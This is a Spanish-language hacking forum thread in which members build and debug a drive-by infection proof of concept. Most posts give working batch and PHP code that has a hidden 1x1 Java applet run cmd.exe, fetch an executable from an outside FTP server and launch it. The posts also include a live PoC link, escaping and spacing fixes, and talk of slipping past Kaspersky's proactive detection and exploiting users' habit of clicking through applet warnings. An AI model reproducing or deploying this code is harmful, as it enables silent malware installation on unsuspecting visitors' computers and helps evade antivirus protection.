elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [POC] Infección Mediante Java Applet (y VBScript)
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: [POC] Infección Mediante Java Applet (y VBScript)  (Leído 30,810 veces)
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #10 en: 2 Enero 2009, 04:03 am »

Estoy trantando de hacerlo todo desde la shell para prescindir del vbs y que no lo detecte el kis, haber si me podéis ayudar, tengo lo siguiente:

Código:
@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

El caso es que ése código funciona perfectamente, me descarga el archivo del ftp y me lo ejecuta, pero cuando trato de pasarlo a php para que lo ejecute el applet con cmd.exe /c de esta forma:

Código
  1. echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
  2. echo "<param name='first' value='
  3. cmd.exe /c
  4. echo usuario@nombreftp.com>C:\datos.txt &
  5. echo contraseña>>C:\datos.txt &
  6. echo cd /path>>C:\datos.txt &
  7. echo pwd>>C:\datos.txt &
  8. echo binary>>C:\datos.txt &
  9. echo get archivo.exe>>C:\datos.txt &
  10. echo bye>>C:\datos.txt &
  11. echo quit>>C:\datos.txt &
  12. ftp -s:C:\datos.txt nombreftp.com &
  13. start archivo.exe
  14. '>";
  15. echo "</applet>";

Al abrir la pagina, el applet se ejecuta, ejecuta los comandos pero me genera un archivo.exe de 0 bytes y obvio da error al ejecutarlo, alguien sabe a que se debe o como lo podría solucionar?

Saludos

PD: Si cae mucha gente, si no fuera por lo del kis sería perfecto, ya que en todos los applets no firmados sale ese mensaje, la gente está acostumbrada a aceptarlo, inicias un chat y sale el mensaje, te vas a jugar al ajedrez y sale ese mensaje, etc...

Edito, el fallo era un espacio, hay que hacer:
Código:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt&echo contraseña>>C:\datos.txt &
NO:
Código:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt &

Un erro tonto que nos costo a mi y a wofo un gran dolor de cabeza, jajaja.

Saludos
« Última modificación: 2 Enero 2009, 20:36 pm por Hacker_Zero » En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Wofo

Desconectado Desconectado

Mensajes: 168


Ver Perfil
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #11 en: 2 Enero 2009, 19:08 pm »

Yo sé... Deberías haberme preguntado...

Este code debería funcionar:

Código
  1. echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
  2. echo "<param name='first' value='
  3. cmd.exe /c
  4. echo usuario@nombreftp.com>C:\\datos.txt &
  5. echo contraseña>>C:\\datos.txt &
  6. echo cd /path>>C:\\datos.txt &
  7. echo pwd>>C:\\datos.txt &
  8. echo binary>>C:\\datos.txt &
  9. echo get archivo.exe>>C:\\datos.txt &
  10. echo bye>>C:\\datos.txt &
  11. echo quit>>C:\\datos.txt &
  12. ftp -s:C:\\datos.txt nombreftp.com &
  13. start archivo.exe
  14. '>";
  15. echo "</applet>";
  16.  

Fíjate en que cuando quieres hacer un '\' tienes que poner '\\' (es igual que en C/C++)

Salu2
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #12 en: 2 Enero 2009, 19:16 pm »

Hay que reconocer que si bien este método necesita de ingenieria social, creo que canta mucho menos que los anteriores  :P

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)
Tengo el KIS así que luego lo pruebo a ver si salta  :rolleyes:
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #13 en: 2 Enero 2009, 19:24 pm »

Ahora lo pruebo yo tambien, en realidad probarlo contra el KIS es probarlo contra el rey y no se si es lo mas adecuado, es decir, Alguien conoce la forma de saltarse la proactiva del KIS?.
Digo que no es lo mas adecuado porque con el tema de las keys en lista negra muchos pasan de instalarlo y van por el NOD, el AVG y demas yerbas. Aunque ahora con esto del kavkiskey ya varios lo estan utilizando pero bueno, en mi caso la mayoria de las personas que conozco no usan kav ni kis.
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #14 en: 2 Enero 2009, 20:34 pm »

Tamos preparando el poc nuevamente sin utilizar vbs, ahora mismo lo subimos para que lo prueben con el kis, haber si lo detecta por proactiva o no, funciona descargando el archivo por ftp desde la shell  ;D.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Wofo

Desconectado Desconectado

Mensajes: 168


Ver Perfil
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #15 en: 2 Enero 2009, 20:36 pm »

ACTUALIZACIÓN:

Con el problema del KIS y KAV, a HACKER_ZERO se le ocurrió hacer la descarga del .exe por medio de batch + FTP. Les dejo el index.php modificado:

Código
  1. <?php
  2. if(isset($HTTP_GET_VARS["board"])) {
  3. $ip = $HTTP_GET_VARS["board"];
  4. echo $ip;
  5. }
  6.  
  7. else $ip = "127.0.0.1";
  8.  
  9. if(isset($HTTP_GET_VARS["topic"])) {
  10. $puerto = $HTTP_GET_VARS["topic"];
  11. echo $puerto;
  12. }
  13.  
  14. else $puerto = 666;
  15.  
  16. echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
  17. echo "<param name='first' value='
  18. cmd.exe /c cd C:\\Windows & echo user@ftp.net>datos.txt&echo clave>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get archivo.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.net&start archivo.exe ".$ip." ".$puerto."&pause'>";
  19. echo "</applet>";
  20.  
  21. ?>
  22.  

Y el link del POC: http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7172

Salu2
« Última modificación: 2 Enero 2009, 20:56 pm por wofox » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #16 en: 3 Enero 2009, 00:00 am »

Tiene que aparecer algo así verdad?  :P


Broma, lo he bajado a mano así que borra esa sonrisa de tu cara  :xD

Sigue quedando en cero el ejecutable, eso si, el KIS no dice nada  :D

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #17 en: 3 Enero 2009, 00:59 am »

Ais no puede ser!!!, lo de 0 bytes estaba solucionado, tiene que ir, vamos a mi me funciona  :rolleyes:. Prueba otra vez haber, dime que windows, vista?

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #18 en: 3 Enero 2009, 01:18 am »

XP :rolleyes: , el ftp simplemente se queda colgado y no termina de bajar nunca  :-\
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet (y VBScript)
« Respuesta #19 en: 3 Enero 2009, 01:22 am »

Pero ves la ventana del ftp? Yo me sale la pantalla de msdos en un pantallazo rapido y se cierra, casi no se nota, luego de poco tiempo, no 3 segundos se me descarga el exe y se ejecuta, te da error al abrir el applet de que el arhivo poc.exe no es una aplicacion win32 valida o no llega ahí? Si hay fallo en el ftp debería mostrar ese error, pero no tiene xk haber fallo, yo lo testeo 20 veces y no falla, haber si alguien mas puede probar  :-\, ahora que pensaba que me saltaba el kav va y ni arranca  :xD.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Páginas: 1 [2] 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Infeccion de dispositivos USBs mediante archivos LNK
Análisis y Diseño de Malware
Jaixon Jax 4 6,972 Último mensaje 1 Diciembre 2010, 02:25 am
por Stelio Kontos
Ejemplo de infección mediante TLS Callbacks
Análisis y Diseño de Malware
The Swash 0 2,322 Último mensaje 16 Mayo 2011, 02:16 am
por The Swash
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines